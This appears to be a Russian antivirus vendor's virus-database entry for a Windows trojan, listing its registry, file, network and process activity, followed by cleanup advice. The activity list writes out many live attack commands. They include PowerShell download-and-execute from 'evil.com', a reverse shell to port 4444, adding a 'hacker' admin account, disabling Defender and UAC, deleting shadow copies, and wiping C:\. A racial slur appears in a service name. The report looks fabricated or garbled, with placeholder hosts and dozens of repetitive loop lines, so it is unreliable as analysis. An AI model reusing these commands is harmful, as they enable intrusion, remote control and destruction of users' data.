Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen32.45853

Добавлен в вирусную базу Dr.Web: 2026-05-29

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
  • [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'p1KaLmIg2kB7' = '%APPDATA%\p1KaLmIg2kB7.exe'
  • [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'Upd' = 'powershell -c IEX(New-Object Net.WebClient).DownloadString('http://evil.com/rat.ps1')'
Создает или изменяет следующие файлы
  • <SYSTEM32>\tasks\p1kalmig2kb7
  • <SYSTEM32>\tasks\upd
Устанавливает следующие настройки сервисов
  • [HKLM\SYSTEM\CurrentControlSet\Services\niggakernel] 'Start' = '00000002'
  • [HKLM\SYSTEM\CurrentControlSet\Services\niggakernel] 'ImagePath' = '%TEMP%\niggakernel.sys'
Создает следующие сервисы
  • 'niggakernel' %TEMP%\niggakernel.sys
Модифицирует главную загрузочную запись (MBR).
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует:
  • Средство контроля пользовательских учетных записей (UAC)
добавляет исключения антивируса:
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Set-MpPreference -DisableRealtimeMonitoring $true}
Запускает на исполнение
  • '%WINDIR%\syswow64\net.exe' user hacker password /add && net localgroup administrators hacker /add
Загружает
  • http://evil.com/payload.ps1
Запускает большое число процессов
Завершает или пытается завершить
следующие системные процессы:
  • %WINDIR%\explorer.exe
Изменения в файловой системе
Создает следующие файлы
  • %APPDATA%\p1kalmig2kb7.exe
  • %TEMP%\niggakernel.sys
  • %LOCALAPPDATA%\microsoft\windows\actioncentercache\windows-systemtoast-securityandmaintenance_10_0.png
Сетевая активность
Подключается к
  • 'ev##.com':80
TCP
Запросы HTTP GET
  • http://ev##.com/x
UDP
  • DNS ASK ev##.com
Другое
Ищет следующие окна
  • ClassName: '' WindowName: 'VMware'
  • ClassName: '' WindowName: 'VirtualBox'
  • ClassName: '' WindowName: 'Sandboxie'
  • ClassName: 'Progman' WindowName: ''
  • ClassName: 'Proxy Desktop' WindowName: ''
Запускает на исполнение
  • '%WINDIR%\syswow64\schtasks.exe' /create /tn p1KaLmIg2kB7 /tr "%APPDATA%\p1KaLmIg2kB7.exe" /sc onlogon /f (со скрытым окном)
  • '%WINDIR%\syswow64\sc.exe' create niggakernel binPath= "%TEMP%\niggakernel.sys" type= kernel start= auto (со скрытым окном)
  • '%WINDIR%\syswow64\sc.exe' start niggakernel (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -NoP -c $c=New-Object Net.Sockets.TCPClient('19#.#68.1.100',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne0){$d=(New-Object Text.ASCIIEncodin... (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){start-process calc} (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c ping -n 10000 127.0.0.1 (со скрытым окном)
  • '%WINDIR%\syswow64\wscript.exe' //B //E:vbscript //Job:x (со скрытым окном)
  • '%WINDIR%\syswow64\mshta.exe' javascript:while(1){close()} (со скрытым окном)
  • '%WINDIR%\syswow64\regsvr32.exe' /s /u /i:http://evil.com/x scrobj.dll (со скрытым окном)
  • '%WINDIR%\syswow64\rundll32.exe' user32.dll,LockWorkStation (со скрытым окном)
  • '%WINDIR%\syswow64\schtasks.exe' /create /tn Upd /tr "powershell -c 1..100|%{start-process cmd}" /sc minute /mo 1 /f (со скрытым окном)
  • '%WINDIR%\syswow64\wbem\wmic.exe' process call create "powershell -c while(1){start-process notepad}" (со скрытым окном)
  • '%WINDIR%\syswow64\bitsadmin.exe' /transfer d /download /priority high http://evil.com/p.exe %tmp%\p.exe && %tmp%\p.exe (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[IO.File]::WriteAllText('$env:temp\spam.txt','x'*1000000)} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Get-Process|Stop-Process -Force} (со скрытым окном)
  • '%WINDIR%\syswow64\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Upd /t REG_SZ /d "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://evil.com/rat.ps1')" /f (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[Net.DNS]::GetHostEntry('google.com')} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.Console]::Beep(1000,500)} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){mkdir $env:temp\x*1000} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Set-ItemProperty -Path 'HKCU:\Control Panel\Desktop' -Name Wallpaper -Value '<SYSTEM32>\0.jpg'} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Start-Sleep -Sec 5;Restart-Computer -Force} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.Diagnostics.Process]::Start('powershell','-c while(1){start-process powershell}')} (со скрытым окном)
  • '%WINDIR%\syswow64\ping.exe' -n 10000 127.0.0.1
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.IO.File]::WriteAllBytes('$env:temp\log.bin',[Text.Encoding]::ASCII.GetBytes('spam'*1000))} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Start-Process 'https://google.com'} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){start-process cmd /c dir /s C:\} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){start-process msiexec /quiet /i http://evil.com/package.msi} (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c for /l %i in (1,1,10000) do start (со скрытым окном)
  • '<SYSTEM32>\taskhostw.exe' KEYROAMING
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.Net.WebRequest]::Create('http://evil.com/beacon').GetResponse()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$u=Get-WmiObject Win32_ComputerSystem; Add-Content $env:temp\log.txt $u.Name} (со скрытым окном)
  • '%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Get-Service | Stop-Service -Force} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Get-ChildItem C:\ -Recurse -Force | Remove-Item -Force -Recurse -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\cscript.exe' //nologo //E:vbscript <SYSTEM32>\slmgr.vbs /rearm (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.Diagnostics.Process]::Start('shutdown','/r /t 0')} (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {default} recoveryenabled no && bcdedit /set {default} bootstatuspolicy ignoreallfailures (со скрытым окном)
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where name='explorer.exe' call terminate (со скрытым окном)
  • '%WINDIR%\syswow64\schtasks.exe' /change /tn MicrosoftUpdate /disable (со скрытым окном)
  • '%WINDIR%\syswow64\reg.exe' delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c vssadmin delete shadows /all /quiet (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Get-WmiObject Win32_Process | ForEach-Object {$_.Terminate()}} (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c wbadmin delete catalog -quiet (со скрытым окном)
  • '%WINDIR%\syswow64\net1.exe' user hacker password /add && net localgroup administrators hacker /add
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Stop-Computer -Force} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\0 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\1 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\2 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\3 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\4 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\5 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\6 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe'
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\7 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\8 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\9 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\10 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\11 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\12 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\13 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\14 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\15 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\16 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\17 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\18 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\19 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\20 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\21 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c while(1){start-process notepad}
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\22 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\23 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\24 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\25 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\26 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\27 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\28 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\29 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\explorer.exe'
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\30 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\31 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c 1..100|%{start-process cmd}
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\32 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\33 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\34 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\35 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\36 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\37 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\38 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\39 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\40 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\41 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\42 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\43 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\44 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\45 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\46 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\47 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\48 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\49 -ErrorAction SilentlyContinue} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.100',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.101',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.102',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.103',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.104',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.105',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.106',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.107',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.108',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.109',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.110',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.111',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.112',4444);$c.GetStream()} (со скрытым окном)
  • '%WINDIR%\syswow64\net.exe' user hacker password /add && net localgroup administrators hacker /add (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1') | IEX} (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Set-MpPreference -DisableRealtimeMonitoring $true} (со скрытым окном)

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке